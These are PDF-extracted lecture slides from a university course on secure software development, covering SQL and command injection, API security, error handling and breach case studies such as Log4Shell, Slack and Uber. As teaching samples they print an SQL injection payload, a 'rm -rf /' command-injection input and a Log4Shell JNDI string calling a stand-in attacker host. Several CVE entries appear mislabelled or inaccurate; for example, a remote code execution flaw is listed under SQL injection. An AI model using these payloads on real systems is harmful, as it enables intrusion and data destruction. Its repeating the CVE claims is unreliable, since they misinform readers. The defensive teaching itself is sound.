COMP3006 - Secure Software Development

Week 6: Program Interaction Security

Dr. Yusuf Kürsat Tuncel

Department of Computer Engineering

April 2025

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 1 / 39
 Outline

1 Introduction to Program Interaction Security

2 SQL Injection

3 Case Study: BeyondTrust & PostgreSQL Injection

4 Command Injection

5 API Security

6 Error Handling and Logging

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 2 / 39
 What is Program Interaction Security?

Ensures that software handles user inputs and external interactions

securely
Protects against common injection attacks and improper resource
access
Includes both prevention and mitigation mechanisms

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 3 / 39
 Types of Program Interactions

User input (form fields, query strings)

File system access
Shell command execution
Database queries
API interactions

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 4 / 39
 Understanding SQL Injection

Attacker manipulates input to alter SQL queries

Leads to unauthorized data access or corruption

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 5 / 39
 SQL Injection Example

SELECT ∗ FROM u s e r s WHERE username = ’ $ u s e r ’ AND p a s s w

If $user is set to admin’ --, the query becomes:
SELECT ∗ FROM u s e r s WHERE username = ’ admin ’ −− ’ AND p

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 6 / 39
 Preventing SQL Injection

Use Prepared Statements / Parameterized Queries

Validate and sanitize all inputs
Use ORM libraries where applicable

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 7 / 39
 Real-World Example: SQL Injection

Incident: Heartland Payment Systems (2008)

Attackers exploited SQL injection to plant malware in payment

processing systems.
Over 100 million credit card numbers were stolen.
Cost the company over $140 million in losses.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 8 / 39
 CVEs Related to SQL Injection

CVE-2019-11043: PHP-FPM remote code execution via crafted

URL in NGINX+PHP
CVE-2017-8917: Joomla SQLi via improper input sanitation in user
model
CVE-2020-9484: Apache Tomcat session persistence flaw with file
name injection

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 9 / 39
 BeyondTrust + PostgreSQL SQL Injection

Vulnerability Chain: CVE-2025-1094 + BeyondTrust Misconfigurations

A zero-day SQL injection vulnerability was discovered in PostgreSQL

15.2 and 16.x.
Combined with flaws in BeyondTrust PRA and RS systems.
Allowed unauthenticated remote attackers to execute arbitrary SQL
queries.
In chained scenarios, attackers achieved full remote code execution
(RCE).
Source: The Hacker News, February 2025

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 10 / 39
 Technical Details of CVE-2025-1094

SQL injection occurred due to unsafe dynamic query construction in a

PostgreSQL extension.
Exploitable via ‘psql‘ or crafted REST API calls.
Improper sanitization of input strings passed to stored procedures.
Example: SELECT get user info(’admin’);–’);

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 11 / 39
 Exploit Flow

1 Attacker sends malicious input to public BeyondTrust API.

2 Input reaches PostgreSQL with unsanitized parameters.
3 SQL injection triggers unauthorized data access or role escalation.
4 Follow-up payload achieves remote code execution.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 12 / 39
 Impact and Affected Versions

Affected PostgreSQL: Versions 15.2–16.1.

Affected BeyondTrust: PRA ¡= 22.3, RS ¡= 23.1.1.
Consequences:
Exposure of credentials and internal session logs.
Access to system-level file storage.
Implantation of persistent access tools/backdoors.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 13 / 39
 Mitigation and Recommendations

Apply PostgreSQL and BeyondTrust patches immediately.

Use parameterized queries — avoid dynamic SQL concatenation.
Monitor ‘psql‘ and API logs for signs of injection patterns.
Restrict superuser privileges from exposed services.
Employ Web Application Firewalls (WAFs) with SQLi detection rules.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 14 / 39
 What is Command Injection?

Occurs when an attacker executes arbitrary commands on the host

OS.
Exploits improper handling of user-supplied input used in system calls.
Can lead to full system compromise.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 15 / 39
 Vulnerable Code Example

import o s
u s e r = input ( ” Enter f i l e n a m e : ” )
os . system ( ” cat ” + u s e r )
User input: ‘test.txt; rm -rf /‘

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 16 / 39
 Preventing Command Injection

Avoid system calls if possible.

Use safe APIs (e.g., Python’s ‘subprocess.run‘ with ‘shell=False‘).
Validate input against a whitelist of allowed values.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 17 / 39
 Safer Python Code

import s u b p r o c e s s
u s e r = input ( ” Enter f i l e n a m e : ” )
s u b p r o c e s s . run ( [ ” cat ” , u s e r ] )
No shell interpretation — safer against injection!

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 18 / 39
 Real-World Example: Command Injection

Incident: GitLab CE/EE (CVE-2018-19571)

GitLab’s Git import feature allowed arbitrary command execution.

Attackers could run shell commands during repository import.
Patched in version 11.4.1.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 19 / 39
 Command Injection in Routers

CVE-2019-19824: TP-Link WR940N - root shell via ping

diagnostics interface
CVE-2016-6277: NETGEAR R7000 - remote root via
unauthenticated command injection
Impact: home routers, IoT devices, and enterprise gateways.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 20 / 39
 Real-World Example: Path Traversal

Incident: Equifax Breach Follow-Up (CVE-2017-5638)

Though a Struts vulnerability was exploited, the same system had

path traversal issues in logs.
Logs were accessible due to poor path sanitation, aiding further
lateral movement.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 21 / 39
 Notable CVEs for Path Traversal

CVE-2020-17506: Apache OFBiz path traversal — arbitrary file

read via crafted URI
CVE-2021-41773: Apache HTTP Server — path traversal in default
configs (RCE chain)
CVE-2019-11510: Pulse Secure VPN — allows unauthenticated file
access via traversal

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 22 / 39
 Why API Security Matters

APIs expose backend functionality to users.

Improper implementation can lead to privilege escalation, data
leakage, etc.
Often targeted due to lack of visibility and access control.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 23 / 39
 Common API Vulnerabilities

Lack of authentication and authorization

Insecure direct object references (IDOR)
Excessive data exposure
Rate limiting absence

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 24 / 39
 Real-World Example: API Security Misconfiguration

Incident: Facebook Graph API Leak (2018)

APIs leaked access tokens due to insufficient permission validation.

Over 50 million users affected.
Exploited chaining of video upload + preview APIs.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 25 / 39
 More API Security Breaches

T-Mobile (2021): Poorly secured API led to leak of 40M customer

records.
Clubhouse (2021): Unauthenticated API allowed scraping of user
profiles.
Parler (2021): No authentication on public APIs, exposed metadata
and private info.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 26 / 39
 Best Practices for API Security

Use strong authentication and token validation (e.g., OAuth2, JWT).

Rate limit and throttle requests.
Avoid exposing internal implementation details.
Validate all client inputs and log abnormal usage patterns.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 27 / 39
 Importance of Secure Error Handling

Revealed error messages may expose sensitive implementation details.

Attackers can infer backend technologies, libraries, database schema,
etc.
Errors should be logged for auditing, but not shown to users.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 28 / 39
 Common Pitfalls in Error Handling

Displaying stack traces or debug logs to users

Inconsistent error codes revealing logic paths
Failing to sanitize or encode error messages
Not logging critical exceptions for forensic analysis

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 29 / 39
 Best Practices for Error Handling

Show generic messages to users: “An error occurred, please try

again.”
Catch exceptions gracefully and log them with context.
Separate logs by severity level (info, warn, error, critical).
Don’t log passwords, session tokens, or PII.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 30 / 39
 Best Practices for Logging

Use centralized and tamper-resistant logging.

Use standard formats (e.g., JSON logs for structured analysis).
Enable log rotation and secure storage.
Implement log alerts for critical events or threshold breaches.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 31 / 39
 Case Study: Log4Shell (CVE-2021-44228)

Vulnerability: Improper input handling in log messages

Log4j processed user input with {{jndi:...}} lookup.

Allowed remote code execution via LDAP servers.
Affected millions of Java applications.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 32 / 39
 Log4Shell Exploit Example

User−Agent : $ { j n d i : l d a p : / / a t t a c k e r . com/ a }
This value is logged, triggering a malicious JNDI lookup.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 33 / 39
 Lessons from Log4Shell

Never trust user input in logging systems.

Sanitize all data before logging.
Review third-party logging libraries for unsafe features.
Keep libraries up to date and monitor CVEs regularly.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 34 / 39
 Slack 2022 Token Leak

Issue: Private GitHub repo exposed authentication tokens

Developer logs included hardcoded and dynamically generated OAuth

tokens.
These logs were pushed to GitHub, making secrets accessible publicly.
Attackers used leaked tokens to access Slack’s internal systems.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 35 / 39
 Lessons from Slack Leak

Never log or store access tokens, secrets, passwords in plaintext.

Use tools like git-secrets, truffleHog, or Gitleaks to scan for
exposed credentials.
Implement pre-commit hooks and secure logging practices.
Rotate and revoke tokens upon exposure — proactively monitor Git
history.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 36 / 39
 Uber Security Breach (2022)

Method: Social engineering + privilege escalation

Attacker compromised internal tools using hardcoded credentials

found in logs.
Logs contained cleartext secrets and tokens stored in network shares
and Slack.
Full access to Uber’s internal infrastructure, AWS, GCP, Slack, and
source code.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 37 / 39
 Security Failures in Uber Breach

Exposed secrets in logs and shared messaging platforms.

No centralized credential vault or audit system.
Failure to apply least privilege principle.
Delayed breach detection due to lack of monitoring.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 38 / 39
 Prevention Lessons from Uber

Use vault solutions (e.g., HashiCorp Vault) for secret storage.

Don’t log environment variables, tokens, or credentials.
Regularly audit logs and internal messaging systems.
Train developers on secure logging and trace redaction.

Dr. Yusuf Kürsat Tuncel (Department of Computer

COMP3006
Engineering)
- Secure Software Development April 2025 39 / 39